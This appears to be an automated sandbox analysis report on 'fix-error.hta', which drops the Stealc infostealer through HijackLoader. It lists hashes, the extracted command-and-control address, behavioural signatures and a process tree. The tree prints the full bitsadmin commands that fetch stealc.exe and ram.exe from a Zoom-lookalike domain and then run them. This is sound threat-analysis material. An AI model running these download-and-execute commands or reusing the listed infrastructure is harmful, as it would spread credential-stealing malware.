Analysis
-
max time kernel
125s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-10-2024 09:45
Static task
static1
Behavioral task
behavioral1
Sample
fix-error.hta
Resource
win7-20240903-en
General
-
Target
fix-error.hta
-
Size
74KB
-
MD5
acfba6ff2e80e0ebc80df9e7d326337c
-
SHA1
fe28d5756815fdac31a744a2f11c075f5b1892bc
-
SHA256
92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
-
SHA512
2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00
-
SSDEEP
768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj
Malware Config
Extracted
stealc
sneprivate29
http://95.182.97.58
-
url_path
/84b7b6f977dd1c65.php
Signatures
-
Detects HijackLoader (aka IDAT Loader) 1 IoCs
resource yara_rule behavioral1/memory/2328-21-0x0000000000400000-0x0000000000561000-memory.dmp family_hijackloader -
HijackLoader
HijackLoader is a multistage loader first seen in 2023.
-
Blocklisted process makes network request 5 IoCs
flow pid Process 5 1804 mshta.exe 7 1804 mshta.exe 9 1804 mshta.exe 11 1804 mshta.exe 15 1804 mshta.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
pid Process 2836 bitsadmin.exe 2856 bitsadmin.exe -
Downloads MZ/PE file
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2328 set thread context of 2940 2328 stealc.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2000 1736 WerFault.exe 47 -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bitsadmin.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language stealc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2852 timeout.exe 1924 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1064 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2328 stealc.exe 2328 stealc.exe 2940 cmd.exe 2940 cmd.exe 1736 explorer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2328 stealc.exe 2940 cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1064 taskkill.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 1804 wrote to memory of 2712 1804 mshta.exe 32 PID 1804 wrote to memory of 2712 1804 mshta.exe 32 PID 1804 wrote to memory of 2712 1804 mshta.exe 32 PID 1804 wrote to memory of 2712 1804 mshta.exe 32 PID 1804 wrote to memory of 2856 1804 mshta.exe 33 PID 1804 wrote to memory of 2856 1804 mshta.exe 33 PID 1804 wrote to memory of 2856 1804 mshta.exe 33 PID 1804 wrote to memory of 2856 1804 mshta.exe 33 PID 2712 wrote to memory of 2852 2712 cmd.exe 36 PID 2712 wrote to memory of 2852 2712 cmd.exe 36 PID 2712 wrote to memory of 2852 2712 cmd.exe 36 PID 2712 wrote to memory of 2852 2712 cmd.exe 36 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 2328 1804 mshta.exe 37 PID 1804 wrote to memory of 1924 1804 mshta.exe 38 PID 1804 wrote to memory of 1924 1804 mshta.exe 38 PID 1804 wrote to memory of 1924 1804 mshta.exe 38 PID 1804 wrote to memory of 1924 1804 mshta.exe 38 PID 2328 wrote to memory of 2940 2328 stealc.exe 40 PID 2328 wrote to memory of 2940 2328 stealc.exe 40 PID 2328 wrote to memory of 2940 2328 stealc.exe 40 PID 2328 wrote to memory of 2940 2328 stealc.exe 40 PID 1804 wrote to memory of 2836 1804 mshta.exe 42 PID 1804 wrote to memory of 2836 1804 mshta.exe 42 PID 1804 wrote to memory of 2836 1804 mshta.exe 42 PID 1804 wrote to memory of 2836 1804 mshta.exe 42 PID 2712 wrote to memory of 1064 2712 cmd.exe 46 PID 2712 wrote to memory of 1064 2712 cmd.exe 46 PID 2712 wrote to memory of 1064 2712 cmd.exe 46 PID 2712 wrote to memory of 1064 2712 cmd.exe 46 PID 2328 wrote to memory of 2940 2328 stealc.exe 40 PID 2940 wrote to memory of 1736 2940 cmd.exe 47 PID 2940 wrote to memory of 1736 2940 cmd.exe 47 PID 2940 wrote to memory of 1736 2940 cmd.exe 47 PID 2940 wrote to memory of 1736 2940 cmd.exe 47 PID 2940 wrote to memory of 1736 2940 cmd.exe 47 PID 2940 wrote to memory of 1736 2940 cmd.exe 47 PID 1736 wrote to memory of 2000 1736 explorer.exe 49 PID 1736 wrote to memory of 2000 1736 explorer.exe 49 PID 1736 wrote to memory of 2000 1736 explorer.exe 49 PID 1736 wrote to memory of 2000 1736 explorer.exe 49
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fix-error.hta"1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID 18042⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\timeout.exetimeout /t 30 /nobreak3⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 18043⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\stealc.exe"C:\Users\Admin\AppData\Local\Temp\stealc.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2940 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1736 -s 8005⤵
- Program crash
PID:2000
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\System32\timeout.exe" /T 2 /nobreak2⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1924
-
-
C:\Windows\SysWOW64\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer secondDownloadJob /download /priority foreground https://us18web-zoom.us/ram.exe C:\Users\Admin\AppData\Local\Temp\ram.exe2⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:2836
-
-
C:\Users\Admin\AppData\Local\Temp\ram.exe"C:\Users\Admin\AppData\Local\Temp\ram.exe"2⤵PID:1660
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M4TQDAHL\favicon[1].ico
Filesize5KB
MD5f3418a443e7d841097c714d69ec4bcb8
SHA149263695f6b0cdd72f45cf1b775e660fdc36c606
SHA2566da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770
SHA51282d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563
-
Filesize
1.0MB
MD56e55da6f9c2e2d5938113bee8a2a2169
SHA18c64d720f95c1427155aec990e536edde887dcc5
SHA2563042740a5872ec6f403da4cb6639625a21b357d7aeb5e065e058bac021e00782
SHA5126a04ca7b341731897e1745d953b136e9e2a3c70fe9186aab7416cbbfdefa6775323f68c9d975ef180bbde363e4c58d897f8f29c1e8119ba56a8a41a844b3e5fd